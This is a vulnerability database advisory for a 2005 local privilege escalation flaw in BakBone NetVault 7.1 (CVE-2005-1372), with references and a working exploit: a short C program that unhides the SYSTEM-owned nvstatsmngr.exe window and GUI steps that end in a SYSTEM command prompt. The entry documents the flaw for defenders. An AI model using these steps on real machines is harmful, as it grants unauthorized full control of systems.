Info

Last Modified

7 months ago

Percent Complete

100%

Disclosure

Apr 27, 2005

Discovery

Unknown

Dates

Exploit

Apr 27, 2005

Solution

Unknown

Description

NetVault contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered by a local attacker initiating the help functionality of the nvstatsmngr.exe process to execute arbitrary commands on the system with SYSTEM level privileges. This flaw may lead to a loss of integrity.

Classification

Location: Local Access Required
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Available
Disclosure: OSVDB Verified

Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Products

BakBone Software, Inc.

NetVault

7.1

References

Bugtraq ID: 13408
Secunia Advisory ID: 15158
CVE ID: 2005-1372 (see also: NVD)
ISS X-Force ID: 20302
FrSIRT Advisory: ADV-2005-0420
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0463.html
Vendor URL: http://www.bakbone.com/

Manual Testing Notes

Exploit:
Compile and run the following code to unhide the C:\ProgramFiles\BakBone Software\NetVault\bin\nvstatsmngr.exe window:

===Start Code===
#include <stdio.h>
#include <windows.h>

int main( void )
{
        HWND hWnd;
        char szWindowName[] = "C:\\Program Files\\BakBone
Software\\NetVault\\bin\\nvstatsmngr.exe";

printf( "Finding window %s\n", szWindowName );

hWnd = FindWindow( NULL, szWindowName );

if ( hWnd == NULL )
        {
                printf( "ERROR! Could not find window %s\n", szWindowName );
        
                exit( 1 );
        }

ShowWindow( hWnd, SW_SHOW );

return 0;
}
===End Code===

1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window will appear. Access the window menu in the upper left and click Properties.
2. Right click on the word Window under the Display Options and click "What's This?"
3. Right click on the help text that is shown in yellow and click Print Topic.
4. Right click on any printer and click Open.
5. Click Help, Help Topics.
6. Right click in the right side of the help screen and click View Source.
7. Notepad will appear (running under the context of the SYSTEM account). Click File, click Open.
8. Change Files of type: to All Files, navigate to the system32 directory and locate cmd.exe. Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the SYSTEM account.

Credit

RedTeam Pentesting - RedTeam Pentesting
David Rice - dricetep.com -

Blogs

Provided by Technorati

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

DONATE NOW!

User Status

Account
- Login
- Sign-Up

Quick Searches